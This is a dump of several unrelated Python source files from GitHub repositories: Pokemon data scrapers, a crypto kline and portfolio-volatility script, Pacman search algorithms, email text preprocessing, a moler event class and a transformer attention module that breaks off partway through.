second_byte\n","repo_name":"Suguivy/pmdrc-randomizer","sub_path":"src/randomizers/dungeonPokemon.py","file_name":"dungeonPokemon.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39728084808","text":"import os\nfrom multiprocessing import Pool, cpu_count, freeze_support\nfrom utils.measure import measure_elapsed_time\nfrom utils.pokemon import get_pokemon_urls, get_pokemon_info\nfrom utils.data import write_file\nfrom shared import parse_args\n\n@measure_elapsed_time\ndef process_data_mp(data):\n\t\tpokemons = []\n\n\t\tpool = Pool(cpu_count())\n\t\tpokemons = pool.map(get_pokemon_info, data)\n\t\tpool.close()\n\t\tpool.join()\n\n\t\treturn pokemons\n\nif __name__ == '__main__':\n\t\targs = parse_args()\n\t\tfreeze_support()\n\t\turls = get_pokemon_urls(args.count)\n\t\tpokemons = process_data_mp(urls)\n\t\twrite_file(os.path.join(os.environ['DATA_DIR'], 'output','pokemons.json') , pokemons)","repo_name":"jerrythomas/feel-the-flow","sub_path":"src/02-pokemons/mp.py","file_name":"mp.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4132180991","text":"\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport requests\n\n# Address class to store HTTP address\nclass Address:\n contract_address=\"https://api.hbdm.com\"\n Kline_http=\"/market/history/kline\"\n\n# error handling method\ndef ErrorHandling(resp):\n error_code=resp.json()['err-code']\n error_msg=resp.json()['err-msg']\n print(\" \\nThere is an error when getting data from the server \\n erroe code: %s erroe message: %s\\n\"%(error_code,error_msg))\n\n# connect server and get row data\ndef Kline(symbol,period,size=150):\n get_msg=Address.contract_address+Address.Kline_http+\"?\"+\"symbol=%s&period=%s&size=%s\"%(symbol,period,size)\n resp=requests.get(get_msg)\n if resp.json()['status']==\"ok\":\n return resp\n else:\n ErrorHandling(resp)\n\n# select json format data in the given time periods\ndef Kline_json(symbol,period,begin_time,end_time):\n resp=Kline(symbol,period,2000)\n begin_time=datetime.datetime.timestamp(begin_time)\n end_time=datetime.datetime.timestamp(end_time)\n json_data=resp.json()\n data=[i for i in json_data['data'] if (i['id']>=begin_time)&(i['id']<=end_time)]\n json_data['data']=data\n return json_data\n\n# get the DataFrame format data\ndef Kline_dataframe(symbol,period,begin_time,end_time):\n json_data=Kline_json(symbol,period,begin_time,end_time)\n df=pd.DataFrame(json_data['data'])\n df['date']=df['id'].apply(lambda x: datetime.datetime.fromtimestamp(x))\n return df\n\n# calculate the weight of given data to get the minimum volatility\ndef minimum_volatility(dataframe):\n dataframe_cov=dataframe.cov()\n dataframe_cov_inv=np.linalg.inv(dataframe_cov)\n return dict(zip(dataframe.columns,dataframe_cov_inv.sum(axis=1)/dataframe_cov_inv.sum(axis=1).sum()))\n\n# calculate the coefficient of efficient frontier function\n# sigma^2=a*mu^2+b*mu+c \n# out put are a, b, c\ndef EfficientFrontier(dataframe):\n df_cov_inv=np.linalg.inv(dataframe.cov())\n df_return=np.mean(dataframe)\n a=df_cov_inv.sum()\n b=(df_cov_inv@df_return).sum()\n c=(df_return.T@df_cov_inv@df_return).sum()\n delta=a*c-b*b\n return a/delta, b/delta, c/delta,\n\n\n\n","repo_name":"kingnewbility/SingAlliance","sub_path":"SingAlliance/SingAlliance.py","file_name":"SingAlliance.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38867381576","text":"# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\nfrom typing import List, Tuple\n\nimport util\n\n\n# from searchAgents import PositionSearchProblem\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self) -> Tuple:\n \"\"\"\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state) -> bool:\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state) -> List[Tuple]:\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\n# Our own node type\nclass Node:\n def __init__(self, state: Tuple[int, int], path: List[str] = None, cost: int = 0):\n if path is None:\n path = []\n self.state: Tuple[int, int] = state # the current location of this node\n self.path: List[str] = path # the path by which we can reach this node from start\n self.cost: int = cost # the current cost reaching from start to this node\n\n\n'''\nOur own dfs or bfs search function. \nThe only difference for them is that DFS uses a stack, while BFS uses a queue.\n'''\n\n\ndef dfs_or_bfs_search(problem: SearchProblem, fringe: util.Stack or util.Queue) -> List[str]:\n # create a stack/queue fringe, and 'visited' list\n visited: List[Tuple[int, int]] = []\n\n # push the first node (start state)\n start_state: Tuple[int, int] = problem.getStartState() # (3,4) [(3,4), []]\n fringe.push(Node(start_state))\n\n while not fringe.isEmpty():\n node: Node = fringe.pop() # pop the first node\n\n if problem.isGoalState(node.state): # check if we have reached the goal (goal node popped)\n return node.path\n\n if node.state not in visited: # check if we have visited. If visited, skip.\n visited.append(node.state)\n else:\n continue\n\n successor: List[Tuple[Tuple[int, int], str, int]] = problem.getSuccessors(node.state)\n for s in successor:\n # The type of each successor item looks like this:\n # e.g. (location, direction, step_cost) ((5, 4), 'South', 1)\n location: Tuple[int, int] = s[0]\n direction: str = s[1]\n if location not in visited:\n fringe.push(Node(state=location, path=node.path + [direction]))\n else:\n return [] # Solution not found!\n\n\ndef depthFirstSearch(problem: SearchProblem) -> List[str]:\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n return dfs_or_bfs_search(problem, util.Stack())\n\n\ndef breadthFirstSearch(problem: SearchProblem) -> List[str]:\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n return dfs_or_bfs_search(problem, util.Queue())\n\n\ndef uniformCostSearch(problem: SearchProblem) -> List[str]:\n \"\"\"Search the node of least total cost first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # create a priority queue as a fringe, and 'visited' list\n fringe: util.PriorityQueue = util.PriorityQueue()\n visited: List[Tuple[int, int]] = []\n # push the first node (start state)\n fringe.push(Node(state=problem.getStartState(), path=[], cost=0), 0)\n while not fringe.isEmpty():\n node: Node = fringe.pop() # pop a node\n if problem.isGoalState(node.state): # check if goal reached\n return node.path\n if node.state not in visited: # check if visited\n visited.append(node.state)\n else:\n continue\n\n # get and traverse successor\n successors: List[Tuple[Tuple[int, int], str, int]] = problem.getSuccessors(node.state)\n for s in successors:\n s_state: Tuple[int, int] = s[0]\n s_direction: str = s[1]\n s_step_cost: int = s[2]\n new_cost: int = node.cost + s_step_cost\n fringe.push(Node(state=s_state, path=node.path + [s_direction], cost=new_cost), new_cost)\n else:\n return [] # solution not found\n\n\ndef nullHeuristic(state, problem=None) -> int:\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\n\ndef aStarSearch(problem: SearchProblem, heuristic=nullHeuristic) -> List[str]:\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # create a priority queue as a fringe, and 'visited' list\n fringe: util.PriorityQueue = util.PriorityQueue()\n visited: List[Tuple[int, int]] = []\n # push the first node (start state)\n start_state: Tuple[int, int] = problem.getStartState() # start state\n start_heu: int = heuristic(start_state, problem) # start state heuristic distance\n fringe.push(Node(state=start_state, path=[], cost=start_heu), start_heu)\n while not fringe.isEmpty():\n node: Node = fringe.pop() # pop a node\n if problem.isGoalState(node.state): # check if goal reached\n return node.path\n if node.state not in visited: # check if visited\n visited.append(node.state)\n else:\n continue\n\n # get and traverse successor\n successors: List[Tuple[Tuple[int, int], str, int]] = problem.getSuccessors(node.state)\n for s in successors:\n s_state: Tuple[int, int] = s[0]\n s_direction: str = s[1]\n s_step_cost: int = s[2]\n # cost from start to the successor node\n new_cost: int = node.cost + s_step_cost\n # estimated total cost (pass through successor node)\n total_cost: int = new_cost + heuristic(s_state, problem)\n fringe.push(Node(state=s_state, path=node.path + [s_direction], cost=new_cost), total_cost)\n else:\n return [] # solution not found\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n","repo_name":"billhu0/CS181","sub_path":"Programming-Assignments/hw1a-search/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"10093820861","text":"from nltk.tokenize import RegexpTokenizer\nfrom stop_words import get_stop_words\nfrom nltk.stem import WordNetLemmatizer\n\ntokenizer = RegexpTokenizer(r'\\w+')\nen_stop = get_stop_words('en')\ntoRemove = ['From:', 'To:', 'Cc:', 'Date:', 'Sent:', 'Subject:', 'Attachments:', 'Doc No', 'Case No', 'U.S.', 'UNCLASSIFIED', 'RELEASE', 'Department of State']\nwnl = WordNetLemmatizer()\n\ndef nlpPipeLine(doc):\n # Tokenize\n tokens = tokenizer.tokenize(doc.lower())\n # Removes stop words\n stopped = [ word for word in tokens if not word in en_stop and len(word)>1 ]\n # Performs stemming\n lemmatized = [ wnl.lemmatize(word) for word in stopped ]\n return lemmatized\n\ndef rawEmailCleaner(doc):\n # Keeps only the lines that do not contain one of the words in the list toRemove\n rawText = ' '.join([line for line in doc.split('\\n') if not sum([word in line for word in toRemove])])\n # Removes all uppercase words\n rawText = ' '.join([word.lower() for word in rawText.split(' ') if not word==word.upper()])\n return rawText\n\ndef processText(doc):\n return nlpPipeLine(rawEmailCleaner(doc))\n","repo_name":"lfaucon/ada-homeworks","sub_path":"Homework_5/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40341625450","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Marcin Usielski, Michal Ernst'\n__copyright__ = 'Copyright (C) 2018-2021, Nokia'\n__email__ = 'marcin.usielski@nokia.com, michal.ernst@nokia.com'\n\nimport abc\nimport six\nimport sys\nimport logging\nfrom moler.event import Event\nfrom moler.cmd import RegexHelper\n\n\n@six.add_metaclass(abc.ABCMeta)\nclass TextualEvent(Event):\n _default_newline_chars = (\"\\n\", \"\\r\") # New line chars on device, not system with script!\n\n def __init__(self, connection=None, till_occurs_times=-1, runner=None):\n super(TextualEvent, self).__init__(connection=connection, runner=runner, till_occurs_times=till_occurs_times)\n self._last_not_full_line = None\n self._newline_chars = TextualEvent._default_newline_chars\n self._regex_helper = RegexHelper() # Object to regular expression matching\n self._paused = False\n self._ignore_unicode_errors = True # If True then UnicodeDecodeError will be logged not raised in data_received\n self._last_recv_time_data_read_from_connection = None # Time moment when data was really received from\n # connection (not when was passed to event). Time is given as datetime.datetime instance\n\n def event_occurred(self, event_data):\n self._consume_already_parsed_fragment()\n super(TextualEvent, self).event_occurred(event_data)\n\n @abc.abstractmethod\n def on_new_line(self, line, is_full_line):\n \"\"\"\n Method to parse output from device.\n Write your own implementation to do something useful\n :param line: Line to parse, new lines are trimmed\n :param is_full_line: True if new line character was removed from line, False otherwise\n :return: None\n \"\"\"\n\n def data_received(self, data, recv_time):\n \"\"\"\n Called by framework when any data are sent by device.\n\n :param data: List of strings sent by device.\n :param recv_time: time stamp with the moment when the data was read from connection.\n :return: None.\n \"\"\"\n if not self._paused:\n self._last_recv_time_data_read_from_connection = recv_time\n try:\n # Workaround for some terminals and python 2.7\n data = u\"\".join(str(data.encode(\"utf-8\", errors=\"ignore\"))) if sys.version_info < (3, 0) else data\n lines = data.splitlines(True)\n for current_chunk in lines:\n if not self.done():\n line, is_full_line = self._update_from_cached_incomplete_line(current_chunk=current_chunk)\n self._process_line_from_output(line=line, current_chunk=current_chunk,\n is_full_line=is_full_line)\n if self._paused:\n self._last_not_full_line = None\n break\n except UnicodeDecodeError as ex:\n if self._ignore_unicode_errors:\n self._log(lvl=logging.WARNING,\n msg=\"Processing data from '{}' with unicode problem: '{}'.\".format(self, ex))\n else:\n raise ex\n\n def _process_line_from_output(self, current_chunk, line, is_full_line):\n \"\"\"\n Processes line from connection (device) output.\n\n :param current_chunk: Chunk of line sent by connection.\n :param line: Line of output (current_chunk plus previous chunks of this line - if any) without newline char(s).\n :param is_full_line: True if line had newline char(s). False otherwise.\n :return: None.\n \"\"\"\n decoded_line = self._decode_line(line=line)\n self.on_new_line(line=decoded_line, is_full_line=is_full_line)\n\n def _update_from_cached_incomplete_line(self, current_chunk):\n \"\"\"\n Concatenates (if necessary) previous chunk(s) of line and current.\n\n :param current_chunk: line from connection (full line or incomplete one).\n :return: Concatenated (if necessary) line from connection without newline char(s). Flag: True if line had\n newline char(s), False otherwise.\n \"\"\"\n line = current_chunk\n if self._last_not_full_line is not None:\n line = u\"{}{}\".format(self._last_not_full_line, line)\n self._last_not_full_line = None\n is_full_line = self.is_new_line(line)\n if is_full_line:\n line = self._strip_new_lines_chars(line)\n else:\n self._last_not_full_line = line\n return line, is_full_line\n\n def is_new_line(self, line):\n \"\"\"\n Method to check if line has chars of new line at the right side\n :param line: String to check\n :return: True if any new line char was found, False otherwise\n \"\"\"\n if line.endswith(self._newline_chars):\n return True\n return False\n\n def _strip_new_lines_chars(self, line):\n \"\"\"\n :param line: line from device\n :return: line without new lines chars\n \"\"\"\n for char in self._newline_chars:\n line = line.rstrip(char)\n return line\n\n def _consume_already_parsed_fragment(self):\n \"\"\"\n Clear already parsed fragment of line to not parse it twice when another fragment appears on device.\n :return: None\n \"\"\"\n self._last_not_full_line = None\n\n def _decode_line(self, line):\n \"\"\"\n Decodes line if necessary. Put here code to remove colors from terminal etc.\n\n :param line: line from device to decode.\n :return: decoded line.\n \"\"\"\n return line\n\n def pause(self):\n \"\"\"\n Pauses the event. Do not process till resume.\n\n :return: None.\n \"\"\"\n self._paused = True\n self._last_not_full_line = None\n\n def resume(self):\n \"\"\"\n Resumes processing output from connection by the event.\n\n :return: None.\n \"\"\"\n self._paused = False\n","repo_name":"nokia/moler","sub_path":"moler/events/textualevent.py","file_name":"textualevent.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"3200757731","text":"import sys\nimport math\nfrom copy import deepcopy\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport os\nfrom CRTN.utils.adaptive import AdaptiveEmbedding\nfrom CRTN.utils.fancy_dropout import WeightDropLinear\nfrom CRTN.utils.utils import padding_hidden\nfrom torchnlp.nn import LockedDropout\n\nimport visdom\nimport time\n\nclass PositionalEmbedding(nn.Module):\n def __init__(self, d_model):\n super().__init__()\n \n self.d_model = d_model\n\n inverse_freq = 1 / (10000 ** (torch.arange(0.0, d_model, 2.0) / d_model))\n self.register_buffer(\"inverse_freq\", inverse_freq)\n\n def forward(self, pos_seq):\n\n sinusoid = torch.einsum(\"bi,j->ibj\", pos_seq, self.inverse_freq)\n\n pos_embedding = torch.cat((sinusoid.sin(), sinusoid.cos()), -1)\n\n return pos_embedding\n\ndef bmm_einsum(tensor1, tensor2, eqn=\"ibnd,jbnd->ijbn\"):\n \"\"\"\n bmm version of \n ibnd,jbnd->ijbn\n ilbn,lbnd->ibnd\n kibnd,kjbnd->ikjbn\n\n this version is used to be compatible with apex\n \"\"\"\n if eqn == \"ibnd,jbnd->ijbn\":\n assert tensor1.shape[1:] == tensor2.shape[1:]\n bmm1 = tensor1.reshape(tensor1.size(0), -1, tensor1.size(-1))\n bmm2 = tensor2.reshape(tensor2.size(0), -1, tensor2.size(-1))\n bmm1 = bmm1.permute(1,0,2)\n bmm2 = bmm2.permute(1,2,0)\n ret = torch.bmm(bmm1,bmm2)\n ret = ret.view(tensor1.size(1), tensor1.size(2), *ret.shape[1:])\n return ret.permute(2,3,0,1)\n elif eqn == \"ilbn,lbnd->ibnd\":\n assert tensor1.size(1) == tensor2.size(0) and tensor1.shape[2:] == tensor2.shape[1:3] \n bmm1 = tensor1.reshape(tensor1.size(0), tensor1.size(1), -1)\n bmm2 = tensor2.reshape(tensor2.size(0), -1, tensor2.size(-1))\n bmm1 = bmm1.permute(2,0,1)\n bmm2 = bmm2.permute(1,0,2)\n ret = torch.bmm(bmm1,bmm2)\n ret = ret.view(tensor1.size(2), tensor1.size(3), *ret.shape[1:])\n return ret.permute(2,0,1,3)\n elif eqn == \"kibnd,kjbnd->ikjbn\":\n assert tensor1.size(0) == tensor2.size(0) and tensor1.shape[2:] == tensor2.shape[2:]\n bmm1 = tensor1.permute(0,2,3,1,4)\n bmm2 = tensor2.permute(0,2,3,4,1)\n bmm1 = bmm1.reshape(-1, bmm1.size(-2), bmm1.size(-1))\n bmm2 = bmm2.reshape(-1, bmm2.size(-2), bmm2.size(-1))\n ret = torch.bmm(bmm1,bmm2)\n ret = ret.view(tensor1.size(0), tensor1.size(2), tensor1.size(3), *ret.shape[1:])\n return ret.permute(3,0,4,1,2)\n\n\n\nclass PostionwiseFF(nn.Module):\n def __init__(self, d_model, d_ff, dropfor):\n super().__init__()\n\n self.d_model = d_model\n self.d_ff = d_ff\n\n self.FFNet = nn.Sequential(\n nn.Linear(d_model, d_ff),\n nn.ReLU(inplace=True),\n LockedDropout(dropfor),\n nn.Linear(d_ff, d_model),\n LockedDropout(dropfor)\n )\n\n self.layer_norm = nn.LayerNorm(d_model)\n\n def forward(self, inputs):\n \n output = self.FFNet(inputs)\n output = self.layer_norm(inputs + output)\n\n return output\n\n\nclass MultiheadSelfAttention(nn.Module):\n def __init__(self, num_head, d_model, d_head, dropout):\n super().__init__()\n\n self.num_head = num_head\n self.d_model = d_model\n self.d_head = d_head\n self.dropout = dropout\n\n self.drop = nn.Dropout(dropout)\n\n self.lin_qkv = nn.Linear(d_model, 3 * num_head * d_head, bias=False)\n self.lin_o = nn.Linear(num_head * d_head, d_model, bias=False)\n\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.scale = 1 / (d_head ** 0.5)\n\n def forward(self, x, pos_emb, mask=None, memory=None, indices=None, weights=None):\n\n seq_len = x.size(0)\n \n x = x + pos_emb[-seq_len:]\n\n if memory is not None:\n c = torch.cat((memory, x), 0)\n else:\n c = x\n\n\n total_len, batch_size = c.size(0), c.size(1)\n\n heads_matrix = self.lin_qkv(c)\n\n heads_q, heads_k, heads_v = torch.chunk(heads_matrix, 3, dim=-1)\n\n heads_q = heads_q.view(total_len, batch_size, self.num_head, self.d_head)[-seq_len:]\n heads_k = heads_k.view(total_len, batch_size, self.num_head, self.d_head)\n heads_v = heads_v.view(total_len, batch_size, self.num_head, self.d_head)\n\n attn_score = torch.einsum(\"ibnd,jbnd->ijbn\", heads_q, heads_k)\n attn_score.mul_(self.scale)\n\n if mask is not None and mask.any().item():\n attn_score.masked_fill_(mask[:,:,:,None], -float('inf'))\n\n attn_prob = F.softmax(attn_score, 1)\n\n attn_vec = torch.einsum(\"ijbn,jbnd->ibnd\", attn_prob, heads_v)\n attn_vec = attn_vec.reshape(seq_len, batch_size, self.num_head * self.d_head)\n\n attn_out = self.lin_o(attn_vec)\n attn_out = self.drop(attn_out)\n\n output = self.layer_norm(x + attn_out)\n\n return output\n\nclass LearnableMultiheadSelfAttention(nn.Module):\n def __init__(self, num_head, d_model, d_head, dropatt, dropwei, same_length=True, no_pos=False):\n super().__init__()\n self.num_head = num_head\n self.d_model = d_model\n self.d_head = d_head\n self.same_length = same_length\n self.no_pos = no_pos\n\n self.dropatt = nn.Dropout(dropatt)\n self.dropattout = LockedDropout(dropatt)\n\n #self.lin_q = nn.Linear(d_model, num_head * d_head, bias=False)\n #self.lin_kv = nn.Linear(d_model, 2 * num_head * d_head, bias=False)\n #self.lin_relemb = nn.Linear(d_model, num_head * d_head, bias=False)\n self.lin_q = WeightDropLinear(d_model, num_head * d_head, bias=False,\n weight_dropout=dropwei)\n self.lin_kv = WeightDropLinear(d_model, 2 * num_head * d_head, bias=False,\n weight_dropout=dropwei)\n self.lin_relemb = WeightDropLinear(d_model, num_head * d_head, bias=False,\n weight_dropout=dropwei)\n self.lin_o = nn.Linear(num_head * d_head, d_model, bias=False)\n\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.scale = 1 / (d_head ** 0.5)\n\n\n def _rel_shift(self, x):\n x_inp = x.reshape(x.size(0), -1, *x.size()[-2:])\n zero_pad = x_inp.new_zeros((x_inp.size(0), 1, *x_inp.size()[2:]))\n x_padded = torch.cat([zero_pad, x_inp], dim=1)\n\n x_padded = x_padded.view(x_inp.size(1) + 1, x_inp.size(0), *x_inp.size()[2:])\n\n x = x_padded[1:].view_as(x)\n\n return x\n\n\n def forward(self, x, pos_emb, pos_bias_u, pos_bias_v, mask=None, cache=None, indice_bool=None, weights=None, neighbor_mem=None, inf_ind=None, theta=1.0):\n \"\"\"\n 3 usage: \n - compute query\n - compute hidden state\n - inference: ind\n \"\"\"\n x_len, batch_size, nhid = x.size(0), x.size(1), x.size(2)\n\n if inf_ind is not None:\n assert inf_ind >= 0 and inf_ind < x_len\n x = x[inf_ind].unsqueeze(0)\n\n if cache is not None:\n cache_num, cache_L = cache.size(0), cache.size(1)\n cache_len = cache_num * cache_L\n cache = cache.view(cache_num * cache.size(1), -1, nhid)\n if not batch_size == cache.size(1):\n cache.unsqueeze_(1)\n cache = cache.expand(-1, batch_size // cache.size(2), -1, -1)\n cache = cache.reshape(cache.size(0), -1, cache.size(-1))\n cache_matrix = self.lin_kv(cache)\n cache_k, cache_v = torch.chunk(cache_matrix, 2, dim=-1)\n else:\n cache_num = 0\n cache_len = 0\n\n if neighbor_mem is not None:\n nei_len = neighbor_mem.size(0)\n nei_matrix = self.lin_kv(neighbor_mem)\n nei_k, nei_v = torch.chunk(nei_matrix, 2, dim=-1)\n else:\n nei_len = 0\n\n heads_q = self.lin_q(x)\n heads_q = heads_q.view(heads_q.size(0), batch_size, self.num_head, self.d_head)\n heads_qu = heads_q + pos_bias_u if pos_bias_u is not None else heads_q\n heads_qv = heads_q + pos_bias_v if pos_bias_v is not None else heads_q\n\n inp_matrix = self.lin_kv(x)\n inp_k, inp_v = torch.chunk(inp_matrix, 2, dim=-1)\n \n rel_emb_matrix = self.lin_relemb(pos_emb)\n rel_cache, rel_nei, rel_inp = rel_emb_matrix.split([cache_len, nei_len, x_len],\n dim=0)\n\n rel_inp = rel_inp.view(x_len, batch_size, self.num_head, self.d_head)\n inp_k = inp_k.view(x_len, batch_size, self.num_head, self.d_head)\n inp_v = inp_v.view(x_len, batch_size, self.num_head, self.d_head)\n AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, inp_k))\n BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_inp))\n\n if neighbor_mem is not None:\n nei_k = nei_k.view(nei_len, batch_size, self.num_head, self.d_head)\n nei_v = nei_v.view(nei_len, batch_size, self.num_head, self.d_head)\n rel_nei = rel_nei.view(nei_len, batch_size, self.num_head, self.d_head)\n nei_AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, nei_k))\n nei_BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_nei))\n\n # if neighbor_mem is empty(0), mask it\n\n if indice_bool is None:\n if neighbor_mem.eq(0).sum() == neighbor_mem.numel():\n nei_mask = torch.cat((mask.new_ones(nei_len), mask.new_zeros(x_len)), 0)\n mask = mask + nei_mask.expand(mask.size(0), -1).unsqueeze(-1)\n\n AC = torch.cat((nei_AC, AC), dim=1)\n BD = torch.cat((nei_BD, BD), dim=1)\n \n \n if indice_bool is not None:\n pre_AC = torch.einsum(\"ibnd,ibk->kibnd\", heads_qu, indice_bool)\n pre_BD = torch.einsum(\"ibnd,ibk->kibnd\", heads_qv, indice_bool)\n cache_k = cache_k.view(cache_num, cache_L, batch_size, self.num_head, self.d_head)\n cache_v = cache_v.view(cache_num, cache_L, batch_size, self.num_head, self.d_head)\n\n rel_cache = rel_cache.view(cache_num, cache_L, batch_size, self.num_head, self.d_head)\n cache_AC = torch.einsum(\"kibnd,kjbnd->ikjbn\", pre_AC, cache_k)\n cache_BD = torch.einsum(\"kibnd,kjbnd->ikjbn\", pre_BD, rel_cache)\n AC_mask = indice_bool.eq(0).transpose(1, 2)[:,:,None,:,None]\n cache_AC.masked_fill_(AC_mask, -float(\"inf\")) \n\n # if neighbor_mem is empty(0) or cache key is empty(0), mask it\n\n if cache.sum(dim=[1,2]).eq(0).sum() > 0:\n nei_mask = neighbor_mem.eq(0).sum().eq(neighbor_mem.numel()).expand(nei_len)\n cache_mask = cache.eq(0).reshape(cache_len, -1).min(dim=-1)[0]\n mask = mask + torch.cat((cache_mask, nei_mask, mask.new_zeros(x_len)), 0).expand(mask.size(0), -1).unsqueeze(-1)\n\n cache_AC = cache_AC.reshape(cache_AC.size(0), -1, batch_size, self.num_head)\n cache_BD = cache_BD.reshape(cache_BD.size(0), -1, batch_size, self.num_head)\n AC = torch.cat((cache_AC, AC), dim=1)\n BD = torch.cat((cache_BD, BD), dim=1)\n \n \n \n #if indice_bool is None and neighbor_mem is None:\n # rel_emb_matrix = rel_emb_matrix.view(x_len, batch_size, \n # self.num_head, self.d_head)\n # heads_k = heads_k.view(x_len, batch_size, self.num_head, self.d_head)\n # heads_v = heads_v.view(x_len, batch_size, self.num_head, self.d_head)\n # AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, heads_k))\n # BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_emb_matrix))\n #else:\n # if indice_bool is not None:\n # cache_AC = torch.einsum(\"ibnd,ibk->kibnd\", heads_qu, indice_bool)\n # cache_BD = torch.einsum(\"ibnd,ibk->kibnd\", heads_qv, indice_bool)\n # cache_k = heads_k.view(cache_num + 1, x_len, batch_size, \n # self.num_head, self.d_head)\n # cache_v = heads_v.view(cache_num + 1, x_len, batch_size, \n # self.num_head, self.d_head)\n\n # cache_rel = rel_emb_matrix.view(cache_num + 1, x_len, \n # batch_size, self.num_head, self.d_head)\n # AC = torch.einsum(\"kibnd,kjbnd->ikjbn\", cache_AC, cache_k)\n # BD = torch.einsum(\"kibnd,kjbnd->ikjbn\", cache_BD, cache_rel)\n # AC_mask = indice_bool.eq(0).transpose(1, 2)[:,:,None,:,None]\n # AC.masked_fill_(AC_mask, -float(\"inf\")) \n\n # # if neighbor_mem is empty(0) or cache key is empty(0), mask it\n # if cache.sum(dim=[1,2]).eq(0).sum() > 0:\n # nei_mask = neighbor_mem.eq(0).sum().eq(neighbor_mem.numel()).expand(nei_len)\n # cache_mask = cache.eq(0).reshape(cache_len, -1).min(dim=-1)[0]\n # mask = mask + torch.cat((cache_mask, nei_mask, mask.new_zeros(x_len)), 0).expand(mask.size(0), -1).unsqueeze(-1)\n # else:\n # rel_emb_matrix = rel_emb_matrix.view(x_len, batch_size, \n # self.num_head, self.d_head)\n # heads_k = heads_k.view(x_len, batch_size, self.num_head, \n # self.d_head)\n # heads_v = heads_v.view(x_len, batch_size, self.num_head, \n # self.d_head)\n # AC = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qu, heads_k))\n # BD = torch.einsum(\"ibnd,jbnd->ijbn\", (heads_qv, rel_emb_matrix))\n\n # # if neighbor_mem is empty(0), mask it\n # if neighbor_mem.eq(0).sum() == neighbor_mem.numel():\n # nei_mask = torch.cat((mask.new_ones(nei_len), mask.new_zeros(x_len)), 0)\n # mask = mask + nei_mask.expand(mask.size(0), -1).unsqueeze(-1)\n # \n # AC.unsqueeze_(1)\n # BD.unsqueeze_(1)\n\n # if neighbor_mem is not None:\n # nei_k = nei_k.view(nei_len, batch_size, self.num_head, self.d_head)\n # nei_v = nei_v.view(nei_len, batch_size, self.num_head, self.d_head)\n # rel_nei = rel_nei.view(nei_len, batch_size, self.num_head, self.d_head)\n # nei_AC = 